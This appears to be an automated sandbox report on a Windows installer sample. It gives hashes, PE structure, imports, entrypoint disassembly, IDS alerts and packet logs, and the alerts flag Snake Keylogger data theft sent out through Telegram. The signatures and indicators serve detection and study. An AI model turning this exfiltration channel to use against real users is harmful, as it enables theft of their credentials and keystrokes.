                                                                                                          SSDEEP:768:HcPiBl7QD/ad4B+etLBBF64vscOIBiMFYnfBc1TS/HVtHlY4bDzZkmNQyFY670Fn:QaxOPt/G9V4yf7P/zZkX00b/h
                                                                                                          MD5:94C4B93474D07658FCBD411A20E68532
                                                                                                          SHA1:66421117EB902B48D39A1514C88C868394085FCF
                                                                                                          SHA-256:50B1D7356F0CC22F2A9AE93A7CC9738C6BC0907724ACDB85F68F594333B706DC
                                                                                                          SHA-512:BC1C40FF5B9FD71590E9B3E71D7B58A46E8AFBE56DFBD22C39F5DC0952ACEDC96F2BC4D8428EA0BCD75D67BD32F2B095585925CD8141063801FB128EA46F7471
                                                                                                          Malicious:false
                                                                                                          Preview:..........................~................................................/........[...............................................R......................R....................................................{.....................................E.........................E.....................................................8...../...................................5.............................................K...........................*.....................................k...................|.......=....................s....................................................................p...2...................................g.N................#................~......................................B..................................................J........................?............................{./.........................U................................z...........+..........................................................K..........................................A......

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                          Entropy (8bit):7.141789881872813
                                                                                                          TrID:
                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                          File name:4NG0guPiKA.exe
                                                                                                          File size:778'465 bytes
                                                                                                          MD5:8f02b3e31021d64ed25a599e58bc8f2f
                                                                                                          SHA1:7bec44b33d33f11de7f626097b70758f60f655f5
                                                                                                          SHA256:ec0c8d7a3312e95aa25f0ce8dd738ed1660246374f6a6d1a268b97ae4d3c4d47
                                                                                                          SHA512:d16554484647d2875b0bcf4b84c7726b14cd96725ba562be2f06714d80468367ecbdfd251c20eee5cd0220fba15becc9c53ccd42fe1110699fe2eb43813fb142
                                                                                                          SSDEEP:12288:xlYZmcRHOg1BFC+gpurATKGOCDUYRpRlUcRzhPnxd2ckxkYJLY:UmcdOOBRg00W4YYJlUcR1vxdgxk2LY
                                                                                                          TLSH:98F4D06F1B068446EE9415F2B8A3DE47A1F5BE7C206873452D66FE1790B3F70398E488
                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L.....oS.................`...*......Z3.......p....@

                                                                                                          File Icon

                                                                                                          Icon Hash:058cc0e474936126

                                                                                                          Static PE Info

                                                                                                          General

                                                                                                          Entrypoint:0x40335a
                                                                                                          Entrypoint Section:.text
                                                                                                          Digitally signed:false
                                                                                                          Imagebase:0x400000
                                                                                                          Subsystem:windows gui
                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                          Time Stamp:0x536FD79B [Sun May 11 20:03:39 2014 UTC]
                                                                                                          TLS Callbacks:
                                                                                                          CLR (.Net) Version:
                                                                                                          OS Version Major:4
                                                                                                          OS Version Minor:0
                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:e221f4f7d36469d53810a4b5f9fc8966

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          sub esp, 000002D4h
                                                                                                          push ebx
                                                                                                          push ebp
                                                                                                          push esi
                                                                                                          push edi
                                                                                                          push 00000020h
                                                                                                          xor ebp, ebp
                                                                                                          pop esi
                                                                                                          mov dword ptr [esp+14h], ebp
                                                                                                          mov dword ptr [esp+10h], 00409230h
                                                                                                          mov dword ptr [esp+1Ch], ebp
                                                                                                          call dword ptr [00407034h]
                                                                                                          push 00008001h
                                                                                                          call dword ptr [004070BCh]
                                                                                                          push ebp
                                                                                                          call dword ptr [004072ACh]
                                                                                                          push 00000008h
                                                                                                          mov dword ptr [00429298h], eax
                                                                                                          call 00007F962CF1ECECh
                                                                                                          mov dword ptr [004291E4h], eax
                                                                                                          push ebp
                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                          push 000002B4h
                                                                                                          push eax
                                                                                                          push ebp
                                                                                                          push 00420690h
                                                                                                          call dword ptr [0040717Ch]
                                                                                                          push 0040937Ch
                                                                                                          push 004281E0h
                                                                                                          call 00007F962CF1E957h
                                                                                                          call dword ptr [00407134h]
                                                                                                          mov ebx, 00434000h
                                                                                                          push eax
                                                                                                          push ebx
                                                                                                          call 00007F962CF1E945h
                                                                                                          push ebp
                                                                                                          call dword ptr [0040710Ch]
                                                                                                          cmp word ptr [00434000h], 0022h
                                                                                                          mov dword ptr [004291E0h], eax
                                                                                                          mov eax, ebx
                                                                                                          jne 00007F962CF1BE3Ah
                                                                                                          push 00000022h
                                                                                                          mov eax, 00434002h
                                                                                                          pop esi
                                                                                                          push esi
                                                                                                          push eax
                                                                                                          call 00007F962CF1E396h
                                                                                                          push eax
                                                                                                          call dword ptr [00407240h]
                                                                                                          mov dword ptr [esp+18h], eax
                                                                                                          jmp 00007F962CF1BEFEh
                                                                                                          push 00000020h
                                                                                                          pop edx
                                                                                                          cmp cx, dx
                                                                                                          jne 00007F962CF1BE39h
                                                                                                          inc eax
                                                                                                          inc eax
                                                                                                          cmp word ptr [eax], dx
                                                                                                          je 00007F962CF1BE2Bh
                                                                                                          add word ptr [eax], 0000h

                                                                                                          Rich Headers

                                                                                                          Programming Language:
                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x5f0000x43188.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x5e680x60002f6554958e1a5093777de617d6e0bffcFalse0.6566162109375data6.419811957742583IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0x90000x202d80x6009587277f9a9b39e2caf86eae07909d87False0.4733072916666667data3.757932017065988IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .ndata0x2a0000x350000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                          .rsrc0x5f0000x431880x43200ad79ab7bc0418c21ba04b90eb50d4a0cFalse0.18500494646182494data4.605797713668011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                          Resources

                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_BITMAP0x5f2b00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                          RT_ICON0x5f6180x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.1810552711779152
                                                                                                          RT_DIALOG0xa16400x144dataEnglishUnited States0.5216049382716049
                                                                                                          RT_DIALOG0xa17880x13cdataEnglishUnited States0.5506329113924051
                                                                                                          RT_DIALOG0xa18c80x100dataEnglishUnited States0.5234375
                                                                                                          RT_DIALOG0xa19c80x11cdataEnglishUnited States0.6091549295774648
                                                                                                          RT_DIALOG0xa1ae80xc4dataEnglishUnited States0.5918367346938775
                                                                                                          RT_DIALOG0xa1bb00x60dataEnglishUnited States0.7291666666666666
                                                                                                          RT_GROUP_ICON0xa1c100x14dataEnglishUnited States1.1
                                                                                                          RT_VERSION0xa1c280x258dataEnglishUnited States0.5216666666666666
                                                                                                          RT_MANIFEST0xa1e800x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                                                                          USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                          ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                          ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                                          VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                                                                                          Possible Origin

                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishUnited States

                                                                                                          Network Behavior

                                                                                                          Suricata IDS Alerts

                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2025-01-11T03:05:23.278926+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.1049708142.250.181.238443TCP
                                                                                                          2025-01-11T03:05:28.438391+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049710132.226.8.16980TCP
                                                                                                          2025-01-11T03:05:35.297783+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049710132.226.8.16980TCP
                                                                                                          2025-01-11T03:05:35.915509+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049712149.154.167.220443TCP
                                                                                                          2025-01-11T03:05:37.704410+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049712149.154.167.220443TCP
                                                                                                          2025-01-11T03:05:40.844817+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049713132.226.8.16980TCP
                                                                                                          2025-01-11T03:05:41.443058+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049714149.154.167.220443TCP
                                                                                                          2025-01-11T03:05:41.624698+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049714149.154.167.220443TCP
                                                                                                          2025-01-11T03:05:45.159302+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049716149.154.167.220443TCP
                                                                                                          2025-01-11T03:05:45.406336+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049716149.154.167.220443TCP
                                                                                                          2025-01-11T03:05:51.763518+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049720149.154.167.220443TCP
                                                                                                          2025-01-11T03:05:52.013161+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049720149.154.167.220443TCP
                                                                                                          2025-01-11T03:05:54.618271+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049722149.154.167.220443TCP
                                                                                                          2025-01-11T03:05:54.865177+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049722149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:02.200710+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049725149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:02.377370+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049725149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:11.751087+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.1049727132.226.8.16980TCP
                                                                                                          2025-01-11T03:06:12.354997+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049728149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:12.529577+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049728149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:15.719575+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049730149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:15.965935+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049730149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:17.658282+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049732149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:17.832210+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049732149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:19.289507+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049734149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:19.535991+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049734149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:21.119452+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049736149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:21.431724+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049736149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:22.988605+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049738149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:23.238549+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049738149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:24.736208+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049740149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:24.909136+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049740149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:26.374032+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049742149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:26.624961+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049742149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:28.100460+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049744149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:28.276828+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049744149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:29.820597+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049746149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:29.999996+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049746149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:31.576717+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049748149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:31.750830+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049748149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:33.254475+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049750149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:33.431948+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049750149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:34.901388+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049752149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:35.151286+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049752149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:36.703013+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049754149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:36.876519+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049754149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:38.859785+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049756149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:39.032361+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049756149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:40.493302+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049758149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:40.757522+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049758149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:42.236480+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049760149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:42.413636+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049760149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:43.906128+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049762149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:44.177514+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049762149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:46.671836+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049764149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:46.849067+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049764149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:48.612707+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049766149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:48.866226+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049766149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:50.439435+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049768149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:50.701288+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049768149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:52.156184+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049770149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:52.402052+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049770149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:53.871628+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049772149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:54.047819+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049772149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:55.817470+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049774149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:55.991776+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049774149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:57.463427+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049776149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:57.713812+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049776149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:59.268236+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049778149.154.167.220443TCP
                                                                                                          2025-01-11T03:06:59.524787+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049778149.154.167.220443TCP
                                                                                                          2025-01-11T03:07:01.199872+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049780149.154.167.220443TCP
                                                                                                          2025-01-11T03:07:01.457769+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049780149.154.167.220443TCP
                                                                                                          2025-01-11T03:07:02.957766+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.1049782149.154.167.220443TCP
                                                                                                          2025-01-11T03:07:03.214933+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.1049782149.154.167.220443TCP

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jan 11, 2025 03:05:21.914495945 CET49708443192.168.2.10142.250.181.238
                                                                                                          Jan 11, 2025 03:05:21.914539099 CET44349708142.250.181.238192.168.2.10
                                                                                                          Jan 11, 2025 03:05:21.914678097 CET49708443192.168.2.10142.250.181.238
                                                                                                          Jan 11, 2025 03:05:21.937899113 CET49708443192.168.2.10142.250.181.238
                                                                                                          Jan 11, 2025 03:05:21.937925100 CET44349708142.250.181.238192.168.2.10
                                                                                                          Jan 11, 2025 03:05:22.592200994 CET44349708142.250.181.238192.168.2.10
                                                                                                          Jan 11, 2025 03:05:22.592303991 CET49708443192.168.2.10142.250.181.238
                                                                                                          Jan 11, 2025 03:05:22.592988968 CET44349708142.250.181.238192.168.2.10
                                                                                                          Jan 11, 2025 03:05:22.593034983 CET49708443192.168.2.10142.250.181.238
                                                                                                          Jan 11, 2025 03:05:22.983067036 CET49708443192.168.2.10142.250.181.238
                                                                                                          Jan 11, 2025 03:05:22.983093977 CET44349708142.250.181.238192.168.2.10
                                                                                                          Jan 11, 2025 03:05:22.984098911 CET44349708142.250.181.238192.168.2.10
                                                                                                          Jan 11, 2025 03:05:22.987194061 CET49708443192.168.2.10142.250.181.238
                                                                                                          Jan 11, 2025 03:05:22.989475012 CET49708443192.168.2.10142.250.181.238
                                                                                                          Jan 11, 2025 03:05:23.031328917 CET44349708142.250.181.238192.168.2.10
                                                                                                          Jan 11, 2025 03:05:23.278932095 CET44349708142.250.181.238192.168.2.10
                                                                                                          Jan 11, 2025 03:05:23.279117107 CET49708443192.168.2.10142.250.181.238
                                                                                                          Jan 11, 2025 03:05:23.279133081 CET44349708142.250.181.238192.168.2.10
                                                                                                          Jan 11, 2025 03:05:23.279220104 CET49708443192.168.2.10142.250.181.238
                                                                                                          Jan 11, 2025 03:05:23.279264927 CET49708443192.168.2.10142.250.181.238
                                                                                                          Jan 11, 2025 03:05:23.279299974 CET44349708142.250.181.238192.168.2.10
                                                                                                          Jan 11, 2025 03:05:23.279350042 CET49708443192.168.2.10142.250.181.238
                                                                                                          Jan 11, 2025 03:05:23.309701920 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:23.309729099 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:23.309799910 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:23.310409069 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:23.310424089 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:23.953073978 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:23.953198910 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:23.957209110 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:23.957217932 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:23.957528114 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:23.957597971 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:23.957986116 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:23.999335051 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.667594910 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.667813063 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.673283100 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.673810005 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.685863018 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.685924053 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.685941935 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.685997963 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.691878080 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.691986084 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.755505085 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.755595922 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.755615950 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.755678892 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.755685091 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.755827904 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.756572008 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.756663084 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.756666899 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.756833076 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.763134956 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.763204098 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.763252974 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.763329983 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.769287109 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.769364119 CET49709443192.168.2.10142.250.186.33
                                                                                                          Jan 11, 2025 03:05:26.769373894 CET44349709142.250.186.33192.168.2.10
                                                                                                          Jan 11, 2025 03:05:26.769519091 CET49709443192.168.2.10142.250.186.33
